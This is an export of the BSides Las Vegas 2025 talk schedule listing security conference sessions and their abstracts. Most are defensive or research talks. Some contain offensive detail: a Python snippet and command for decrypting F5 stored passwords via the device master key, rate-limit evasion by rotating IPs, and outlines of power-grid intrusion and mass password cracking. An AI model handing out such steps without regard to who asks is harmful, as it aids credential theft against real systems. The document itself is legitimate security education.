            <summary>Broke but Breached: Secret Scanning at Scale on a Student Budget</summary>
            <description>Secrets are being pushed everywhere in the wild. Given that most major security breaches involve secrets being exposed—like the SolarWinds breach and many others—I became fascinated by how often secrets are being publicly leaked and how little effort it can take to find them if you know where to look.

I wanted to perform secret scanning at scale, but I’m a student with a limited budget. So I’m going to talk about how I maximized the compute power available to me using Kubernetes and leveraged it to scan for secrets at scale.

### Infrastructure Setup:

Given my constraints as a broke college student, I looked at what I had available: I recently completed my CKA and CKS certifications, and I had access to $100 in free Azure credits through a student account, plus similar free-tier resources across various cloud providers. My solution? Use Kubernetes to orchestrate compute resources across multiple accounts.

To set up the infrastructure, I used K3s to run a master node on my Azure account using those $100 credits very carefully. Then, I asked a few friends—also students—to use their own free credits to spin up virtual machines in their Azure accounts. I connected all of these together using Tailscale, putting them on the same virtual network. K3s was the best choice due to its lightweight footprint and simplicity.

Right now, I’m building out a Terraform configuration so I can just give my friends a link to my Terraform Cloud project. That way, they can deploy their own VM and have it automatically join my cluster. This assumes a level of trust between me and them. I’m actively working on a secure abstraction layer so they can deploy without being exposed to (or able to access) any secrets.


#### Scanning VS Code Extensions:
The next phase of the project is to scan VS Code extensions for secrets. It might seem like overkill, especially considering Microsoft’s API rate limits, but I have a workaround.

Here’s how it works:
- Every morning, a Kubernetes CronJob spins up and pulls a fresh list of VS Code extensions recently published to the marketplace.
- These extensions are then distributed to Docker containers running TruffleHog, which scan them for known patterns of exposed secrets.
- Redis is used for fast, in-memory storage of scan results.
- Every 3 minutes, Redis syncs with a persistent master database for durability and redundancy.
- All of this orchestration and data handling is written in Go.


##### API Rate Limiting and IP Rotation:
Microsoft is fairly generous with rate limits, but I wanted to plan for scale. 
I set up a paid VPN service and developed a solution where IP addresses are rotated using a FIFO queue in AWS SQS. IPs are rotated in and out of the queue based on usage, helping me work around API rate limits.

This idea is still being refined, but it&#x27;s designed to allow future scaling with more nodes and broader scanning capabilities.

### Current Status:

To test the idea, I wrote a quick set of Python 3 scripts and downloaded around 10,000 VS Code extensions. I’ve already identified exposed credentials including:
OpenAI keys, Hugging Face tokens, AWS credentials, SSH private keys, and more.

Since this initial proof of concept was successful, I plan to slowly expand the setup, refine the automation, and run these scans at scale, as explained above.

### Tools:
Kubernetes (K3s)
Tailscale (networking)
Terraform Cloud (for easy node deployment)
Docker
TruffleHog – https://github.com/trufflesecurity/trufflehog
Redis (fast key-value storage)
GoLang (core orchestration logic)
Python3 (initial PoC + scraping scripts)
AWS SQS (FIFO) – used for VPN IP queueing
Amazon DocumentDB (it&#x27;s in the always-free tier)

---
### 📌 A Note to the CFP Review Board

**Just a quick note** — *I&#x27;m still working on the explained setup for my talk*, and the outline I&#x27;m submitting right now reflects my current plan. *Some things might evolve* as I make progress and depending on how everything comes together. Also, *please reach out to me before the talk title is published on the website.* I’m planning to collaborate with a few folks and want to give them a heads-up before anything goes public.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Proving Ground Talk-25m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/X7ERWF/</url>
            <location>Firenze</location>
            
            <attendee>Ming Chow</attendee>
            
            <attendee>Raviteja</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>7EYXUL@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-7EYXUL</pentabarf:event-slug>
            <pentabarf:title>Reversing F5 Service Password Encryption</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T100000</dtstart>
            <dtend>20250805T102000</dtend>
            <duration>002000</duration>
            <summary>Reversing F5 Service Password Encryption</summary>
            <description>This technique was developed in 2022 by X-Force and withheld from broader distribution for several years to protect the broader community. Now that it&#x27;s 2025, the weaponized version of the CVE-2022-1388 exploit will be released (we modified a zephyphish exploit). The gist of it is this:

1. retrieve f5 master key from unit with `f5mku -K` and that gives the master key

2. the password storage is effectively AES-128 in Electronic Codebook Mode, as demonstrated with this python snippet

        # get the master key from the F5
        master_key_str = get_master_key(target_url)
        # decode the master key
        master_key_data = base64.b64decode(master_key_str)
        # it&#x27;s basically salted AES in ECB mode
        aes = AES.new(master_key_data, AES.MODE_ECB)
        # loop over the goods to decrypt
        for ciphertext in password_list:
            # grab everything past $M$xx$ which is the ciphertext
            cipher_data = base64.b64decode(ciphertext[6:])
            # we store in cleartext because we need to chop off the salt and decode it
            cleartext = aes.decrypt(cipher_data)
            # displaytext = decoded text with salt
            displaytext = cleartext.decode(&quot;utf-8&quot;)
            # xtext is what we finally show after the salt has been removed, the value of xx above
            xtext = displaytext.removeprefix(ciphertext[3:5])
            # show the final text
            print(&quot;Ciphertext: &quot; + str(ciphertext) + &quot; Cleartext: &quot; + xtext)

    return

This really could be 10 minutes but I&#x27;m going to add some history to the talk</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/7EYXUL/</url>
            <location>Tuscany</location>
            
            <attendee>Dustin Heywood</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>JAZY78@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-JAZY78</pentabarf:event-slug>
            <pentabarf:title>Phish-Back: How to turn the problem into a solution.</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T103000</dtstart>
            <dtend>20250805T105000</dtend>
            <duration>002000</duration>
            <summary>Phish-Back: How to turn the problem into a solution.</summary>
            <description>As explained in the abstract, I worked as a SOC Manager for international companies for nearly 10 years. A little over two years ago, I was confronted with the worst cyber crisis management of my career due to spear phishing. I then came up with this “phish-back” strategy to finally regain technical control over the issue of identity theft, which is currently mainly managed through employee awareness.

As there has been very little public research on this topic, the team I put together has experimented and learned how to create the best defensive phishing techniques. The goal of this approach is to create fake pages exposed to the internet that would tempt attackers to try out what they have stolen in order to gain access to the network. 

The goal of this talk is to present our work and explain to technical teams how they can implement such a strategy in their organization. There are many technical pitfalls to avoid and a huge amount of reverse engineering to anticipate in order to prevent adversaries from discovering that this is a fake gateway to the network.  The 20-minute talk will consist of approximately 15 minutes of technical presentations/demos and 5 minutes of context and results.

The part that excites me the most is presenting the results we have observed over the last two years. As a technical expert and pentester, I knew the strategy was great, but I had no idea that attackers would take the bait so readily. I am very happy to present these research results and give back to the community.

You may notice that I have built a company around this strategy after working on it for many months as a side project with my team. I am passionate about cyber security above all else, and the name of our company or the products we sell will never be mentioned once in the presentation. I have attended dozens of conferences in my life, and nothing would annoy me more than seeing someone come and sell something at this type of conference. This is first and foremost a technical conference, by an enthusiast and for enthusiasts.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/JAZY78/</url>
            <location>Tuscany</location>
            
            <attendee>Gautier Bugeon</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>NK9P3P@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-NK9P3P</pentabarf:event-slug>
            <pentabarf:title>Lessons from Black Swan Events and Building Anti-Fragile Cybersecurity Systems</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T110000</dtstart>
            <dtend>20250805T112000</dtend>
            <duration>002000</duration>
            <summary>Lessons from Black Swan Events and Building Anti-Fragile Cybersecurity Systems</summary>
            <description>Dumpster fires litter a virtual landscape defined by unpredictability and accelerating digital threats, and cybersecurity must evolve beyond traditional notions of resilience. In this compelling session, Dave Lewis explores how organizations can move past merely withstanding disruption to actively benefiting from it by building anti-fragile cybersecurity systems. Borrowing from the work of Nassim Nicholas Taleb, Dave will introduce the concept of anti-fragility—the idea that certain systems grow stronger when exposed to volatility, shocks, and stressors—and examine its practical relevance in today’s cybersecurity landscape.

Through vivid real-world examples, including a deep dive into the global impact and lessons learned from the WannaCry ransomware attack, Dave will illustrate how black swan events can expose critical systemic weaknesses—but also create opportunities to reimagine how we defend our digital environments. He will argue that while advanced security solutions play a role, it’s the foundational elements—such as password management, widespread adoption of multi-factor authentication, and a culture of cyber awareness—that often make the difference between a breach and a bullet dodged.

This session is designed to equip security professionals, technical leaders, and business stakeholders with actionable guidance to help their organizations not just survive the next unexpected crisis, but emerge stronger because of it. Attendees will leave with a clear understanding of anti-fragile principles and how to apply them to create cybersecurity programs that are not just reactive or robust, but dynamically adaptive in the face of chaos.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/NK9P3P/</url>
            <location>Tuscany</location>
            
            <attendee>Dave Lewis</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>XTUW3N@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-XTUW3N</pentabarf:event-slug>
            <pentabarf:title>Taking down the power grid!</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T140000</dtstart>
            <dtend>20250805T144500</dtend>
            <duration>004500</duration>
            <summary>Taking down the power grid!</summary>
            <description>The talk is a step-by-step war story on how we as a Red Team were able to go from nothing to physical access to the EMP secure server room with the servers that control the power grid for a large part of the country. It contains topics such as infrastructure hacking, default passwords, PIN code &quot;eavesdropping&quot;, access card encryption key revelation, access card cloning, social engineering, etc. It is a scary story on how it was possible to get access to the EMP secure server room for a power company, and place a dummy bomb.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/XTUW3N/</url>
            <location>Tuscany</location>
            
            <attendee>John-André Bjørkhaug</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>KX3CRZ@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-KX3CRZ</pentabarf:event-slug>
            <pentabarf:title>What to Tell Your Developers About NHI Secrets Security and Governance</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T150000</dtstart>
            <dtend>20250805T154500</dtend>
            <duration>004500</duration>
            <summary>What to Tell Your Developers About NHI Secrets Security and Governance</summary>
            <description>Non-Human Identities (NHIs) outnumbered humans 45 to 1 in 2022. Given that their access abuse is one of the most easily exploited attack paths, we really need to get a handle on NHI security right now. But how do we start? What do we even tell the developer? We can&#x27;t tell them to just not keep building applications, and secrets security alone has not addressed all the concerns NHI security requires.

Once again, OWASP is here to shed some light on the situation right as this issue becomes a major, mainstream concern. In January of 2025, they released the Top 10 Non-Human Identity Risks, which highlights exactly how NHIs keep getting exploited and gives us a guide to raising awareness and prioritizing and remediating the situation inside our organizations.

But they are not the only ones who released a guide or even a top 10 list. This talk will guide us through the commonalities of all the published wisdom around NHI security, and we will end with a discussion that governance is a path forward but will need to go through IAM and, eventually, the whole organization.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/KX3CRZ/</url>
            <location>Tuscany</location>
            
            <attendee>Dwayne McDaniel</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>7PHURF@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-7PHURF</pentabarf:event-slug>
            <pentabarf:title>Cracking 936 Million Passwords</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T170000</dtstart>
            <dtend>20250805T174500</dtend>
            <duration>004500</duration>
            <summary>Cracking 936 Million Passwords</summary>
            <description>0 About Me

1 A brief history of password cracking

2 Dump from Have I Been Pwned
    Good news – they are NTLM format
    Bad news – 936,000,000
    This requires a Big Data approach and lots of RAM

3 Hardware and software used
    Strategy used to crack passwords
    Rainbow Tables
    Good for finding a few passwords, bad for finding millions of passwords
    John the Ripper
    Infrequent official releases, Many unofficial releases
    Poor Graphical Processor Unit (GPU) Windows support
    Easy to make custom rules
    Good mailing list support
    Hashcat
    6.2.6 latest release Sep 2022
    Great GPU acceleration
    Primitive rule syntax
    Dictionary attacks take a lot of memory
    Custom Tools I wrote
    Custom Rules
    The exponential cost of finding passwords
    You will never find all of the passwords

4 Found passwords
    Found password statistics
    Control characters in passwords

5 Defense against having your password cracked
    Don&#x27;t use NTLM
    2 factor authentication
    Use cryptographically strong random passwords
    Use a password manager</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/7PHURF/</url>
            <location>Tuscany</location>
            
            <attendee>Jeff Deifik</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>QPBRHA@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-QPBRHA</pentabarf:event-slug>
            <pentabarf:title>Cracking Hidden Identities: Understanding the Threat Surface of Hidden Identities and Protecting them Against Password Exposure</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T180000</dtstart>
            <dtend>20250805T184500</dtend>
            <duration>004500</duration>
            <summary>Cracking Hidden Identities: Understanding the Threat Surface of Hidden Identities and Protecting them Against Password Exposure</summary>
            <description>This talk is based on research conducted by LayerX Security on its customer base, analyzing the identity and password security practices of end users for both corporate and non-corporate accounts. 
Some of the parameters for which we have metrics include:
•	Password strength (for both corporate and non-corporate accounts)
•	Usage patterns (of corporate vs. non-corporate account activity on SaaS apps)
•	Details of password re-use and cross-account password sharing
•	Account sharing between users
•	Usage patterns of SSO on corporate accounts (and SaaS applications)
•	Analysis of user password exposure based on public data breach databases
•	And more
Some key highlights from the research:
•	Corporate Passwords are Just as Weak as Personal Passwords: Over 54% of corporate passwords are classified as medium strength or below, meaning modern password-cracking tools and hardware could easily break them. This is remarkably close to the percentage of risky non-corporate passwords, where 58% of personal passwords were medium-strength or below.
•	Enterprises Are Blind to Most Identity Usage: Over 40% of SaaS applications in organizational networks are accessed via personal credentials. Moreover, over two-thirds of corporate login events are done without SSO. Together, they account for over 80% of SaaS activity on corporate networks and endpoints. This means security and IT teams are blind to usage of these accounts, and have little-to-no visibility and control over their activities, security controls (such as password security policies) or where they are used.
•	Just 2% of Users Are Organizations’ Biggest Security Risk: These are users who have a history of exposure that includes exposed passwords, do not use SSO-backed passwords, and have weak passwords that can be easily cracked. If cybersecurity is all about risk management, these users are the biggest risk you should worry about.
•	Browser Extensions are a Significant Threat to Users’ Identity: 66.6% of extensions have ‘high’ or ‘critical’-level permissions and 40% of users have such extensions installed. 13% of extensions have access to users’ cookies, meaning they could potentially use those cookies and access tokens to steal corporate identities.
In this talk, we’ll cover the research in detail to provide a strong empirical foundation and then use it to identify key password risks in the new ‘SaaS’ economy and offer actionable best practices and guidelines to address these gaps.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/QPBRHA/</url>
            <location>Tuscany</location>
            
            <attendee>Or Eshed</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>KZGVRJ@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-KZGVRJ</pentabarf:event-slug>
            <pentabarf:title>Global BSides Organizers Un-Conference Meet-Up</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T190000</dtstart>
            <dtend></dtend>
            <duration>030000</duration>
            <summary>Global BSides Organizers Un-Conference Meet-Up</summary>
            <description>Global BSides Organizers Un-Conference Meet-Up

This year, we&#x27;re adding a little light structure so we can gauge topics and have more non-blocking conversations.  If you organize a regional BSides conference, come hang out with your colleagues, make some connections, and learn!</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event2HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/KZGVRJ/</url>
            <location>Tuscany</location>
            
            <attendee>milqtst</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>AHT3D8@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-AHT3D8</pentabarf:event-slug>
            <pentabarf:title>Mental Models to Anticipate the Next Stages of the AI and Cybersecurity Revolution</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T100000</dtstart>
            <dtend>20250805T104500</dtend>
            <duration>004500</duration>
            <summary>Mental Models to Anticipate the Next Stages of the AI and Cybersecurity Revolution</summary>
            <description>AI and cybersecurity threats are evolving at a rapid pace and unfortunately, many of us are often caught off guard, reacting tactically to the latest issues rather than thinking strategically about what might come next. This talk delves into the power of mental models as a proactive tool to better understand, anticipate, and mitigate both current and future AI and cybersecurity risks.

I will cover several different mental models, such as the Cynefin Model, People Process Technology trio, OSI model, DIKW Pyramid, NIST CSF, Kahneman’s System 1 and 2, OODA loop, Cyber Defense Matrix, DIE Triad, and more.

Moreover, I’ll show what I have newly discovered when I combined these mental models. These new discoveries point directly to currently emerging and previously unforeseen risks, but they also reveal patterns for how to address these risks.

This is not just a theoretical discussion. These mental models support clear thinking for decision making and produce insights that can be translated into tactical actions. For example, the Cynefin model, when combined with the People Process Technology trio, reveals the hard limits of automation and indicates when we should rely upon technology vs services to tackle new challenges, such as GenAI. In another example, combining the DIKW Pyramid with the Cyber Defense Matrix and the OSI model shows fundamental flaws in data-centric approaches when dealing with the leakage of sensitive content through LLMs. I&#x27;ll use the OODA loop to show how it can be applied to Agentic AI and what type of controls we will need to secure them.

Without the insights that these models reveal, we will approach the future blind. Even worse, we might approach the future with a false sense of assurance that our current controls will continue to work.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/AHT3D8/</url>
            <location>Siena</location>
            
            <attendee>Sounil Yu</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>XH9W7Q@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-XH9W7Q</pentabarf:event-slug>
            <pentabarf:title>Advancing Network Threat Detection Through Standardized Feature Extraction and Dynamic Ensemble Learning</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T110000</dtstart>
            <dtend>20250805T112000</dtend>
            <duration>002000</duration>
            <summary>Advancing Network Threat Detection Through Standardized Feature Extraction and Dynamic Ensemble Learning</summary>
            <description>This research is from my undergraduate senior thesis for my degree in Applied Computer Science - Cybersecurity from the University of South Carolina to be conferred in May 2025. Through my prior work in Infosec and an extensive literature review, I found deficiencies in both traditional NIDS solutions and ML-driven detection experiments that rely too heavily on limited datasets and monolithic classifiers. Over the past 18 months, I developed a feature extraction framework standardizing packet and flow statistics to enhance model generalization across multiple environments, including CTU-13, TON_IoT, USTC-TFC2016, and custom-collected benign traffic. Eight machine learning models were selected to represent varied classification strategies: Random Forest, Isolation Forest, Gaussian Mixture Models, Quadratic Discriminant Analysis, AdaBoost, XGBoost, CNN, and RNN.

I then designed the Ford-CSWV ensemble algorithm, which applies dynamic class-specific weighting to model outputs during classification, improving robustness across traffic variations. Experimental results demonstrate that while the ensemble yields only minor gains in overall accuracy compared to top individual models, it significantly improves stability and adaptability, which are critical for real-world implementations.

The talk will include a detailed walkthrough of the difference between NIDS and NDR, feature selection rationale, model training approaches, the mechanics of the Ford-CSWV ensemble classifier, and the classification results of my experiment. Slides include dataset comparisons, classifier diagrams, and ensemble methodology visuals. I will not be conducting a live demo, but the session will be highly visual and practical, and designed for security practitioners, researchers, and students interested in applied ML for cybersecurity.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/XH9W7Q/</url>
            <location>Siena</location>
            
            <attendee>Jason Ford</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>8KYQ3Q@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-8KYQ3Q</pentabarf:event-slug>
            <pentabarf:title>Increasing Complexity and Frequency of Cyber Events: Trends, Costs, and Risk Mitigation Strategies</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T140000</dtstart>
            <dtend>20250805T144500</dtend>
            <duration>004500</duration>
            <summary>Increasing Complexity and Frequency of Cyber Events: Trends, Costs, and Risk Mitigation Strategies</summary>
            <description>The cyber claims and risk environment is evolving. The year 2024 was a record-breaking year for cyber events. The threat of ransomware events continues, and cyber events are growing in complexity. Cyber risks associated with third parties are increasing in complexity and frequency. Understanding digital supply chain risk is essential to cyber risk management. This session will show attendees some of the cost factors and ways to navigate the changing risk environment.

Marsh McLennan collects cybersecurity incidents, cybersecurity controls, and claims data from thousands of organizations in its client portfolio. There are different organization-dependent factors that contribute to the severity of cyber events. These include record counts and types in possession, industry, revenue, and cyber security controls.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/8KYQ3Q/</url>
            <location>Siena</location>
            
            <attendee>Wendy Hou-Neely</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>TKNLJQ@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-TKNLJQ</pentabarf:event-slug>
            <pentabarf:title>RAG Against the Machine: Using Retrieval-Augmented Generation and MCP to Fortify Cybersecurity Defenses</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T150000</dtstart>
            <dtend>20250805T154500</dtend>
            <duration>004500</duration>
            <summary>RAG Against the Machine: Using Retrieval-Augmented Generation and MCP to Fortify Cybersecurity Defenses</summary>
            <description>In this session, I will present the architecture, use cases, and lessons learned from deploying CADDIE, a self-hostable Retrieval-Augmented Generation platform tailored to cybersecurity. With growing adoption of LLMs, enterprises are facing a gap: how to contextualize outputs with real, trusted data across threat detection, policy writing, and compliance monitoring. This is where the Model Context Protocol (MCP) shines—allowing structured ingestion of logs, threat intelligence, policy documents, and MITRE mappings into an LLM interface.

Attendees will see:

How MCP structures retrieval pipelines and token-efficient prompts

RAG in action for GRC (e.g., SOC 2, ISO 27001, DORA) and threat detection workflows

Case studies from proof-of-concepts with financial institutions, think tanks, and public-sector orgs

Why context-aware GenAI reduces hallucinations and increases interpretability in cyber operations

Red team and blue team applications of MCP: from compliance automation to contextualized alert triage

This talk draws on prior research and presentations, including Black Hat 2024 (“Leveraging RAG for Proactive Cybersecurity Posture”) and my AI Summit talk on RAG-powered policy agents. Attendees will leave with an understanding of how to incorporate RAG in their cyber environments and how structured context via MCP is a key defense layer when working with LLMs in production.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/TKNLJQ/</url>
            <location>Siena</location>
            
            <attendee>Brennan Lodge</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>GTYAKW@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-GTYAKW</pentabarf:event-slug>
            <pentabarf:title>Predicting the Lifespans of Internet Services: Falling down the ML Rabbit Hole, and What We Learned From The Thud</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T170000</dtstart>
            <dtend>20250805T174500</dtend>
            <duration>004500</duration>
            <summary>Predicting the Lifespans of Internet Services: Falling down the ML Rabbit Hole, and What We Learned From The Thud</summary>
            <description>One key aspect of Internet-Wide scanning research is “When should I scan this entity again?”. In this talk, I talk about how descriptive analyses (presented last year!) are insufficient in finding trends at an Internet-scale, and instead a better way to tackle this question is via a more methodological approach with ML techniques. In this talk, I go over the promises of ML, and what we faced in reality at each step of the way. While we were inevitably successful in applying ML techniques to our use case, it does illuminate that sometimes you can’t just throw an ML model at the problem naively, especially when you have so many contextual aspects to account for, and the need to re-work your outputs and expectations to match a more realistic model. Specifically, my talk will cover the following: 

1) How did we get here?
- Last year we were like WOAH, lots of differences, but then trying to apply it in practice meant shifting the question to “can we predict the lifespan of a service”, such that we can predict when to scan it again?
2) What were the promises of ML?
- ML models would help with prediction, and also bring up interesting facets such as feature importance (should we be scanning based on port, or port and some other variable?).
- We tried some straightforward methods based on our inputs and outputs and immediately ran into some crazy and gnarly problems 
3) Taking a step back – what do we need, and what do we have?
- We have a highly multi dimensional categorical dataset that we really cannot change.
- We really want to know when we should rescan something, or even a gradient of “scan these more, scan these other ones less”
4) Reframing the question and recognizing the aspects we couldn’t change led us down a new path
- Can we predict ephemerality? Which allows us to bucket hosts that we need to rescan more frequently vs hosts that we don’t need to rescan more frequently
- Yes!! We can. 
5) Now that we found a model that worked for us, we discuss evaluation and metrics
- Typically you focus on things like precision, recall, and f1 scores, and we see some variance in those that is not unexpected given the output data (walk through this example)
- In practical settings, we might want to reframe our metrics to be 
- We also show which features are most important to the prediction, which is slightly different than our hypothesis going into the problem, but not wholly unexpected</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/GTYAKW/</url>
            <location>Siena</location>
            
            <attendee>Ariana Mirian</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>ZRBVME@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-ZRBVME</pentabarf:event-slug>
            <pentabarf:title>Indexing the Chaos: Extract PII from Ransomware Leaks</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T180000</dtstart>
            <dtend>20250805T184500</dtend>
            <duration>004500</duration>
            <summary>Indexing the Chaos: Extract PII from Ransomware Leaks</summary>
            <description>The tool was developed as a response to a growing blind spot in breach awareness: unstructured data dumped by ransomware gangs. Traditional tools focus on structured email/password leaks. In contrast, ransomware leaks are a dumpster fire of scanned ID cards, tax records, and resumes, usually dropped on .onion sites or mirror dumps. No one wants to parse that—so I did.

This talk breaks down how I built:

    A crawler (breach.house) that collects dump data (Ransomware Leaks, Normal Breaches, Stealer Logs, Leads)

    A backend pipeline that:

        Ingests mixed-format files (PDF, DOC, images, databases, etc.)

        Uses OCR to extract text from image-based leaks

        Feeds results into a fine-tuned LLM that recognizes contextual PII

    A frontend search engine (haveibeenransom.com) that shows only metadata, not PII, and flags where data might have been exposed.

This talk will explain how I implemented protections to comply with privacy law (GDPR, Article 6) and prevent misuse. No PII is shown. Users can only search identifiers (email, passport number) and see where it may have appeared—without downloading any leak.

This tool is open-source (in part) and still under active development. It’s a blend of OSINT, NLP, ethical grey zones, and threat intelligence, all rolled into one live system.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/ZRBVME/</url>
            <location>Siena</location>
            
            <attendee>Juanma</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>KQWJAH@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-KQWJAH</pentabarf:event-slug>
            <pentabarf:title>Power Play: AI Dominance Depends on Energy Resilience</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T100000</dtstart>
            <dtend>20250805T110000</dtend>
            <duration>010000</duration>
            <summary>Power Play: AI Dominance Depends on Energy Resilience</summary>
            <description>The United States faces a multifaceted challenge in maintaining its technological edge, particularly in AI. While much attention is given to semiconductor production and algorithm development, the foundation of AI supremacy lies in a stable, resilient, flexible, and abundant energy infrastructure. Private capital flows into chips and frontier models; government agencies and labs can only chase and shape the attention of resources. Disruptions in one sector can profoundly impact another: recent challenges, such as the extreme shortage of voltage step-down transformers and heavy reliance on non-domestic equipment, significantly hinder the growth and expansion of AI data centers.

